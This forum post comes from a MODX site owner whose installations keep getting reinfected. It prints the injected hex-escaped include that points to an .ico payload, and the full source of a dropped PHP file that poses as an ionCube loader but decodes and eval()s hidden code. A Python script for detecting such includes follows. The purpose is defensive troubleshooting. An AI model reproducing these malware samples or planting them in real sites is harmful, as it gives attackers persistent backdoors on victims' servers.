After hours and hours of reading and trial and error, I'm out of options.
Installation info:
- MODX version: 2.6.1
- PHP version: 5.6.33
- DB info: mysql, version: 10.0.29-MariaDB-cll-lve
My MODX installations keep getting compromised.
Malicious code is injected in certain index.php files. Example:
/*3e166*/
@include "\x2fho\x6de/\x64eb\x3950\x391/\x64om\x61in\x73/m\x69dd\x65lb\x75rg\x67ez\x69ch\x74va\x6ede\x73ta\x64.n\x6c/p\x75bl\x69c_\x68tm\x6c/a\x73se\x74s/\x63om\x70on\x65nt\x73/r\x65ca\x70tc\x68av\x32/f\x61vi\x63on\x5f20\x324c\x36.i\x63o";
/*3e166*/
The includes are referring to ICO files, which contain scrambled code.
Besides this, the hack also creates new, random files, like:
ucwuwapz.php
footer21.php
vexwzlkn.php
Contents of footer21.php (similar to the other files):
<?php //000310
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0x99d-0x4ed)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;
?>
Another practical problem is that MODX sites that are infected will stop working after a while.
I did all the standard stuff and followed the excellent guide at
https://forums.modx.com/thread/94643/how-to-clean-up-your-hacked-webspace
- Checked for malicious plugins/users
- Changed all passwords, from MODX users to DirectAdmin/FTP/DB
- Moved the website to a new hosting account
- Used the guide mentioned earlier to identify malicious includes via SSH
Unfortunately this will only temporarily remove the infection.
Right now the only thing I can do is run a cronjob that removes all unwanted ICO files from my host every hour...
I'm not sure if this is a specific MODX related infection. The truth is that only MODX-installations are affected right now.
Is there someone who experienced the same problems and found a solution? Any advice is welcome!
Thanks in advance.
[ed. note: hartmanrik last edited this post 6 years, 1 month ago.]
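An added detection example, my own code and not from the thread above: it scans PHP source for include/require statements, resolves PHP's \xHH and octal escapes so you can see where an obfuscated include really points, and flags the traits of the injected snippet (escaped path, non-PHP target such as .ico, wrapped in a pair of /*hex*/ marker comments). The sample source and the /home/example/... path are constructed for the demo.

```python
import re

# @include "..." / require_once("...") with a double-quoted literal argument
INCLUDE_RE = re.compile(
    r'(?:@\s*)?\b(include|include_once|require|require_once)\b\s*\(?\s*"((?:[^"\\]|\\.)*)"')
# Escapes PHP resolves inside double-quoted strings: \xHH, \NNN (octal), simple ones
ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b', 'f': '\f',
          '\\': '\\', '$': '$', '"': '"'}
# Marker comment like /*3e166*/ that the injected block is wrapped in
MARKER_RE = re.compile(r'/\*[0-9a-f]{4,8}\*/')

def decode_php_dq(s: str) -> str:
    """Resolve the escapes of a PHP double-quoted string literal (no variable interpolation)."""
    def one(m):
        e = m.group(1)
        if e[0] == 'x':
            return chr(int(e[1:], 16))
        if e[0] in '01234567':
            return chr(int(e, 8))
        return SIMPLE[e]
    return ESCAPE_RE.sub(one, s)

def scan_php(source: str) -> list:
    """Return (raw_literal, decoded_target, reasons) for each suspicious include."""
    findings = []
    for m in INCLUDE_RE.finditer(source):
        raw, target, reasons = m.group(2), decode_php_dq(m.group(2)), []
        if re.search(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3})', raw):
            reasons.append('hex/octal-escaped include path')
        ext = target.rsplit('.', 1)[-1].lower() if '.' in target else ''
        if ext not in ('php', 'inc', 'phtml'):
            reasons.append(f'non-PHP include target (.{ext})')
        before = source[max(0, m.start() - 40):m.start()]
        after = source[m.end():m.end() + 40]
        if MARKER_RE.search(before) and MARKER_RE.search(after):
            reasons.append('wrapped in /*hex*/ marker comments')
        if reasons:
            findings.append((raw, target, reasons))
    return findings

# Constructed sample: one injected include in the style seen on infected sites, one legitimate one.
SAMPLE = r'''<?php
/*3e166*/
@include "\x2fho\x6de/\x65xa\x6dpl\x65/a\x73se\x74s/\x66av\x69co\x6e_2\x3024\x636.\x69co";
/*3e166*/
require_once "core/config/config.inc.php";
'''

if __name__ == '__main__':
    for raw, target, reasons in scan_php(SAMPLE):
        print(f'{target}\n  {", ".join(reasons)}')
```

Run it over every index.php under the web root (for example with `find ... -name index.php`) to list the decoded targets, which also tells you which .ico files to pull for analysis before deleting them.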